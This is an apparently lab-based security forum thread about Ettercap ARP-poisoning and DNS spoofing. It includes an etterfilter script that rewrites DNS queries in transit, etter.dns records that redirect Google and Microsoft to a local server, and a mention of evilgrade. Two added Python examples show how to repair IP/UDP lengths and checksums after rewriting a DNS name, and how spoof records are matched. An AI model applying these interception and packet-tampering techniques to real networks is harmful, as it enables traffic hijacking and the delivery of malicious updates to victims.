
Thread: Experimenting with Ettercap

  1. #1
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default Experimenting with Ettercap

    I have spent the day playing with ettercap and learning about all of its great features. I am VERY impressed with its features, especially the custom filter capabilities. Being able to manipulate network traffic at the packet level in real time is some pretty cool stuff. So I just have a couple of questions and hopefully some of the informed people on these forums can shed some light on some things for me. My environment is as follows.

    one laptop running BT3 final
    one windows XP box
    Both plugged directly into a linksys router/switch

    First off, I can't get the dns_spoof plugin to work. I edit /user/local/share/ettercap/etter.dns, then save changes and start the plugin. When the Windows client accesses the web, the only DNS spoofing that works is the entries already built into the etter.dns file as examples, like forwarding microsoft.com to linux.org etc. My additions don't seem to work. I know the first reaction of most people is that I must be typing in the records wrong, but I promise I have tried tons of times and I know it's not a syntax mistake.

    The second problem I have run into is with a custom filter I was playing with to kind of work around the dns spoofing not working. Here is the filter

    Code:
    # HTTP requests (TCP port 80): look for the marker in the raw request data
    if (ip.proto == TCP && tcp.dst == 80) {
         if (search(DATA.data, "Accept-Rubbish!")) {
              replace("Accept-Rubbish!", "Accept-Rubbish!");
              msg("zapped Accept-Rubbish!\n");
         }
    }

    # DNS queries (UDP port 53): rewrite the queried name in the decoded payload
    if (ip.proto == UDP && udp.dst == 53) {
         if (search(DECODED.data, "tools")) {
              replace("tools", "yahoo");
              msg("Replaced Tools\n");
         }
    }
    Now this works: if I try to go to tools.com I get yahoo.com. The problem is when I change the word tools to a word that is not the same character length as yahoo. I watched the packets with Wireshark and what ends up happening is a checksum error on the packet header. Does anyone know how to work around something like that? Maybe a way to change the packet header checksum value by adding or subtracting from it? Or does someone know a better way to accomplish what I am trying to do? Sorry if I'm posting in the wrong area of the forum, but I am a newb so I thought this is where my question should be. Thanks!
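
    Added example, not code from the thread or from ettercap: a Python walk-through of the checksum problem described in the post above. It builds a constructed IPv4/UDP DNS query for tools.com and compares a bytes-only swap of the name (the effect of a plain substitution) with a rewrite that also fixes the DNS label length byte, the IP total length, the UDP length and both checksums. The addresses, ports and transaction ID are made up for the demonstration.

```python
"""Why a different-length name swap inside a DNS query breaks the packet, and what
has to be recomputed to repair it. Added example for this thread, not ettercap code;
the addresses, ports and DNS transaction ID below are constructed."""
import struct

UDP_PROTO = 17


def ones_complement_sum(data: bytes) -> int:
    """RFC 1071 sum of 16-bit big-endian words with end-around carry."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return total


def checksum(data: bytes) -> int:
    """Internet checksum; over a header that includes its own checksum it is 0 when valid."""
    return (~ones_complement_sum(data)) & 0xFFFF


def dns_query(txid: int, name: str) -> bytes:
    """Minimal DNS query: 12-byte header, one A/IN question, labels length-prefixed."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)   # RD set, QDCOUNT 1
    qname = b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)            # QTYPE A, QCLASS IN


def fix_lengths_and_checksums(pkt: bytes) -> bytes:
    """Recompute IP total length/checksum and UDP length/checksum from the actual bytes."""
    ihl = (pkt[0] & 0x0F) * 4
    ip, udp, payload = bytearray(pkt[:ihl]), bytearray(pkt[ihl:ihl + 8]), pkt[ihl + 8:]
    udp_len = 8 + len(payload)
    struct.pack_into("!H", ip, 2, ihl + udp_len)          # IP total length
    struct.pack_into("!H", ip, 10, 0)                     # zero the field before summing
    struct.pack_into("!H", ip, 10, checksum(bytes(ip)))
    struct.pack_into("!H", udp, 4, udp_len)               # UDP length
    struct.pack_into("!H", udp, 6, 0)
    pseudo = bytes(ip[12:20]) + struct.pack("!BBH", 0, UDP_PROTO, udp_len)
    udp_sum = checksum(pseudo + bytes(udp) + payload) or 0xFFFF   # a zero result is sent as 0xFFFF
    struct.pack_into("!H", udp, 6, udp_sum)
    return bytes(ip) + bytes(udp) + payload


def build_packet(src: bytes, dst: bytes, sport: int, dport: int, payload: bytes) -> bytes:
    """IPv4 header (no options) + UDP header + payload, lengths and checksums filled in."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 0, 0x1234, 0x4000, 64, UDP_PROTO, 0, src, dst)
    udp = struct.pack("!HHHH", sport, dport, 0, 0)
    return fix_lengths_and_checksums(ip + udp + payload)


def verify(pkt: bytes):
    """(ip_ok, udp_ok): do the length fields and checksums agree with the bytes on the wire?"""
    ihl = (pkt[0] & 0x0F) * 4
    ip, rest = pkt[:ihl], pkt[ihl:]
    total_len = struct.unpack_from("!H", pkt, 2)[0]
    udp_len = struct.unpack_from("!H", rest, 4)[0]
    pseudo = ip[12:20] + struct.pack("!BBH", 0, UDP_PROTO, udp_len)
    ip_ok = total_len == len(pkt) and checksum(ip) == 0
    udp_ok = udp_len == len(rest) and checksum(pseudo + rest) == 0
    return ip_ok, udp_ok


def qname(pkt: bytes) -> str:
    """Question name of the DNS query carried in pkt."""
    ihl = (pkt[0] & 0x0F) * 4
    dns, i, labels = pkt[ihl + 8:], 12, []
    while dns[i]:
        n = dns[i]
        labels.append(dns[i + 1:i + 1 + n].decode())
        i += 1 + n
    return ".".join(labels)


def rewrite_label(pkt: bytes, old: bytes, new: bytes) -> bytes:
    """Swap one DNS label for another of any length (<= 63) and repair every dependent field."""
    if len(new) > 63:
        raise ValueError("a DNS label is at most 63 bytes")
    ihl = (pkt[0] & 0x0F) * 4
    dns, i = bytearray(pkt[ihl + 8:]), 12
    while dns[i]:
        n = dns[i]
        if bytes(dns[i + 1:i + 1 + n]) == old:
            dns[i:i + 1 + n] = bytes([len(new)]) + new    # the length byte must change too
            n = len(new)
        i += 1 + n
    return fix_lengths_and_checksums(pkt[:ihl + 8] + bytes(dns))


# Constructed addresses: victim 192.168.1.10 asking the router 192.168.1.1.
SRC, DST = bytes([192, 168, 1, 10]), bytes([192, 168, 1, 1])


def demo():
    query = build_packet(SRC, DST, 53211, 53, dns_query(0xBEEF, "tools.com"))
    return {
        "original": verify(query),
        "same_length_bytes_only": verify(query.replace(b"tools", b"yahoo")),
        "same_length_fixed": verify(rewrite_label(query, b"tools", b"yahoo")),
        "longer_bytes_only": verify(query.replace(b"tools", b"toolbox")),
        "longer_fixed": verify(rewrite_label(query, b"tools", b"toolbox")),
        "longer_fixed_name": qname(rewrite_label(query, b"tools", b"toolbox")),
    }


if __name__ == "__main__":
    for case, result in demo().items():
        print(f"{case:24} {result}")
```

    Two things the results show. Even the equal-length tools -> yahoo swap leaves the UDP checksum stale until it is recomputed, so whatever performs the replace has to do that step as well. A longer or shorter label additionally moves the length byte in front of it and both length fields, so "adding or subtracting" from the checksum alone cannot rescue the packet; an incremental update (RFC 1624) only covers the words you changed, and recomputing everything from the final bytes, as fix_lengths_and_checksums does, is the simpler and safer route.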

  2. #2
    Member imported_pynstrom's Avatar
    Join Date
    May 2008
    Posts
    143

    Default

    You're right, my first guess would be a syntax error in the etter.dns file. And just as an example, this works fine for me:
    Code:
    * A 65.98.92.48
    *.* A 65.98.92.48
    *.*.* A 65.98.92.48
    *.*.*.* A 65.98.92.48
    As far as the filter goes, if the code you posted is a copy/paste from your filter, the second and third lines of your code should look like this:
    Code:
    if (search(DATA.data, "Accept-Encoding")) {
        replace("Accept-Encoding", "Accept-Rubbish!");
    The way you have it set up now the first replace command doesn't do anything. This might solve the rest of the problem, if it doesn't a partial fix for the text swapping would be to add spaces to the spoofed address as the browser should work with "www.yahoo.com" or "www.yahoo .com". This only works if the spoofed address is shorter than the original one.
    When hungry, eat your rice; when tired, close your eyes. Fools may laugh at me, but wise men will know what I mean. -- Lin-Chi
    - - - - - - - -
    I slept once, it was a Tuesday.

  3. #3
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    More on etterfilter: http://forums.remote-exploit.org/showthread.php?p=94904
    Also Google "etterfilter forums".

  4. #4
    Senior Member
    Join Date
    Jan 2010
    Posts
    140

    Default

    Wow, I don't know how I did that. That was not a copy/paste and my actual code was correct. I am still having some trouble but I will check the etterfilter forums as suggested. Thanks guys.

  5. #5
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Quote Originally Posted by dudeman02379 View Post
    First off, I can't get the dns_spoof plugin to work. I edit /user/local/share/ettercap/etter.dns, then save changes and start the plugin. When the Windows client accesses the web, the only DNS spoofing that works is the entries already built into the etter.dns file as examples, like forwarding microsoft.com to linux.org etc. My additions don't seem to work. I know the first reaction of most people is that I must be typing in the records wrong, but I promise I have tried tons of times and I know it's not a syntax mistake.
    I am having this exact same problem. Strangely enough, it is only on my BackTrack laptop machine. I am running Ubuntu on my desktop and have ettercap on that machine as well, and it works well, sort of.
    Here is my "/usr/share/ettercap/etter.dns" on my Ubuntu machine:

    ################################
    # microsoft sucks
    # redirect it to www.linux.org
    #
    google.com A 192.168.1.3
    *.google.com A 192.168.1.3
    microsoft.com A 192.168.1.3
    *.microsoft.com A 192.168.1.3
    www.microsoft.com PTR 192.168.1.3 # Wildcards in PTR are not allowed

    ##########################################

    The IP forwards them to my local Apache server for a wonderful white page that says only "Holy Haxor Batman!"

    Here is the breakdown of what is working, using IE 6.0 on the victim:
    google.com gets Haxor
    www.google.com gets Haxor
    microsoft.com gets Haxor
    www.microsoft.com gets real MS site. It used to go to linux under the default but stopped working when I changed the IP. (very strange)

    anything with prefix.microsoft.com gets the normal webpage. Anything with prefix.google.com gets Haxor.

    Now on my BackTrack machine I do the exact same procedure with (nearly) the exact same configuration, only at "/usr/local/share/ettercap/etter.dns":

    ################################
    # microsoft sucks
    # redirect it to www.linux.org
    #
    google.com A 192.168.1.3
    *.google.com A 192.168.1.3
    www.google.com PTR 192.168.1.3
    microsoft.com A 192.168.1.3
    *.microsoft.com A 192.168.1.3
    www.microsoft.com PTR 192.168.1.3 # Wildcards in PTR are not allowed

    ##########################################

    All requests get their normal returns, even microsoft.com, where the only edit was replacing the IP address. Typing 192.168.1.3 in the browser gets Haxor, so the server is still up.

    What is strange is that in the ettercap feed, when I visit the pages I'm trying to spoof, it responds with:
    "dns_spoof: [www.google.com] spoofed to [192.168.1.3]"
    "dns_spoof: [clients1.google.com] spoofed to [192.168.1.3]"
    "dns_spoof: [www.microsoft.com] spoofed to [192.168.1.3]"
    "dns_spoof: [i.microsoft.com] spoofed to [192.168.1.3]"
    etc...

    This would suggest that I am editing the proper file, that the changes are taking effect and that the plugin is loading correctly into ettercap.

    I can think of only one possible reason for all this to happen. My BT box is an old laptop using a wifi connection. My victim is also an old laptop using wifi, while my ubuntu is an alienware monster wired to the LAN. All three machines are located in the same room with my router 1 room over (about 10 feet away) through a solid wooden wall.

    Is it possible that because my Ubuntu box is faster/wired it is beating the DNS query and inserting its spoofed one first, while my slower/wifi box is just not doing it fast enough to beat the server? If we were working with airpwn I'm sure that would be the problem, but I'm not sure if that is the same way ettercap's ARP poisoning/DNS spoofing works.

    Been working on this all day and could use some help, thanks guys! :-)
    Morpheus: "You take the blue pill - the story ends, you wake up in your bed and believe whatever you want to believe. You take the red pill - you stay in Wonderland and I show you how deep the rabbit-hole goes."

    Neo: "What if I take both?"

    Morpheus: "Don't do that! You end up like Nick Nolte!"
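
    Added example, not code from the thread or from ettercap: a Python parser for etter.dns records that reports which line would answer each of the queries listed in the post above, plus the catch-all records from the second post. It also shows how a PTR line is used: the IP on the right is the key that a reverse (in-addr.arpa) query is matched against and the name on the left is the answer, which is why the shipped file says wildcards are not allowed in PTR records. Assumptions, to be checked against the ettercap version you run: names are matched as shell-style globs (a `*` spans dots), the first matching line in file order wins, and matching is case-insensitive.

```python
"""Parse etter.dns records and work out which line would answer a query.

Added example for this thread, not ettercap's own code. Assumptions: patterns are
shell-style globs ('*' spans dots, '?' is one character), the first matching line
in file order wins, and matching is case-insensitive."""
from fnmatch import fnmatchcase

# Constructed copy of the etter.dns fragment from the Ubuntu box in the post above.
ETTER_DNS = """
################################
# redirect google and microsoft to the local apache box
#
google.com A 192.168.1.3
*.google.com A 192.168.1.3
microsoft.com A 192.168.1.3
*.microsoft.com A 192.168.1.3
www.microsoft.com PTR 192.168.1.3 # Wildcards in PTR are not allowed
"""


def parse_etter_dns(text):
    """Return [(name_or_pattern, rtype, value)] in file order; comments and blanks dropped."""
    records = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()           # '# ...' comments, full-line or trailing
        if not line:
            continue
        fields = line.split()
        if len(fields) != 3:
            raise ValueError(f"line {lineno}: expected 'name TYPE value', got {raw!r}")
        name, rtype, value = fields[0].lower().rstrip("."), fields[1].upper(), fields[2]
        if rtype not in ("A", "PTR"):
            raise ValueError(f"line {lineno}: unsupported record type {rtype}")
        if rtype == "PTR" and any(c in name for c in "*?"):
            # For PTR the name is the answer, not the key, so a wildcard has nothing to match.
            raise ValueError(f"line {lineno}: wildcards are not allowed in PTR records")
        records.append((name, rtype, value))
    return records


def validate(text):
    """None if the file parses, otherwise the parse error as a string."""
    try:
        parse_etter_dns(text)
        return None
    except ValueError as err:
        return str(err)


def lookup(records, qname, rtype="A"):
    """Answer for qname, or None when no record applies."""
    qname = qname.lower().rstrip(".")
    if rtype == "PTR":
        # Reverse queries arrive as d.c.b.a.in-addr.arpa; match the IP, return the name.
        suffix = ".in-addr.arpa"
        if not qname.endswith(suffix):
            return None
        ip = ".".join(reversed(qname[:-len(suffix)].split(".")))
        for name, t, value in records:
            if t == "PTR" and value == ip:
                return name
        return None
    for pattern, t, value in records:
        if t == "A" and fnmatchcase(qname, pattern):
            return value
    return None


def demo():
    """Resolve the names from the post's breakdown against the fragment above."""
    records = parse_etter_dns(ETTER_DNS)
    names = ["google.com", "www.google.com", "clients1.google.com",
             "microsoft.com", "www.microsoft.com", "i.microsoft.com", "example.org"]
    answers = {n: lookup(records, n) for n in names}
    answers["3.1.168.192.in-addr.arpa PTR"] = lookup(records, "3.1.168.192.in-addr.arpa", "PTR")
    return answers


def catch_all_example():
    """The second post's records: under glob matching the bare '*' already covers every name."""
    records = parse_etter_dns("* A 65.98.92.48\n*.* A 65.98.92.48\n")
    return lookup(records, "any.host.example")


if __name__ == "__main__":
    for query, answer in demo().items():
        print(f"{query:32} -> {answer}")
    print("catch-all:", catch_all_example())
    print("bad PTR:", validate("*.microsoft.com PTR 192.168.1.3"))
```

    Run against the fragment, every A query in the breakdown (including www.microsoft.com and i.microsoft.com) resolves to 192.168.1.3 and only the unrelated example.org falls through, so the file itself is not what separates the hosts that got spoofed from the one that did not. The catch-all check shows that with glob semantics `*` on its own matches any name and the `*.*` variants add nothing.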

  6. #6
    Member
    Join Date
    Jan 2008
    Posts
    194

    Default

    Quote:
    I can think of only one possible reason for all this to happen. My BT box is an old laptop using a wifi connection. My victim is also an old laptop using wifi, while my Ubuntu is an Alienware monster wired to the LAN. All three machines are located in the same room with my router 1 room over (about 10 feet away) through a solid wooden wall.

    Is it possible that because my Ubuntu box is faster/wired it is beating the DNS query and inserting its spoofed one first, while my slower/wifi box is just not doing it fast enough to beat the server? If we were working with airpwn I'm sure that would be the problem, but I'm not sure if that is the same way ettercap's ARP poisoning/DNS spoofing works.
    I can't offer you any solutions to your other problems but I think I know the answer to the quoted.

    I assume you're doing ARP poisoning and as such, every packet destined for the router gets routed through your machine, wifi or not. The target is sending packets to your wireless card mac that resides on the machine running ettercap. Therefore, I assume it to be unlikely that there is a timing issue that is causing ettercap to "miss" the DNS request.

  7. #7
    Member
    Join Date
    Sep 2008
    Posts
    146

    Default

    Quote Originally Posted by dudeman02379 View Post
    Now this works as if I try to go to tools.com I get yahoo.com. The problem is when I change the word tools to a word that is not the same character length as yahoo. I watched the packets with wireshark and what ends up happening is a checksum error on the packet header. Does anyone know how to work around something like that? Maybe a way to change the packet header checksum value by adding or subtracting from it? Or does someone know a better way to accomplish what I am trying to do? Sorry if I'm posting in the wrong area of the forum but I am a newb so I thought this is where my question should be. Thanks!
    Shameless bump, however I would really like to know if anyone has made any headway on this issue. I've been trying to get evilgrade working and this issue with etter.dns not working is a major roadblock. I've been able to get etter.dns working on my wired desktop, but it simply won't work off any of my laptops.

    Wired Desktop (2.4ghz AMD dual-core, 3 gig RAM) on Ubuntu Hardy, dns spoof: WORKING
    Wireless Laptop 1 (1.5ghz pentium 512 ram) BT3beta, dns spoof: NOT WORKING
    Wireless Laptop 2 (2.0ghz Core2Duo 3gig ram) BT3Final, dns spoof: NOT WORKING

    Cain & Abel DNS spoofing, however, works on all three...

    From Wireshark I'm getting two different problems. On Laptop 1 I get both a spoofed and a normal reply; the victim gets both and selects the normal reply over the spoofed one. On Laptop 2 there is simply no spoofed reply going out.

    I have tried this from both HD installs and USB live boots, I have used the exact same configuration and syntax that worked on my desktop.

    The only workaround I have been able to concoct is to set up the evilgrade webserver on a VM running BackTrack in Windows and use Cain & Abel to divert traffic to it. It works, but it is incredibly annoying to set up correctly, especially when it should "JUST WORK" with ettercap. Not to mention any time a person who knows better boots Windows, god kills a kitten, and I like kittens...
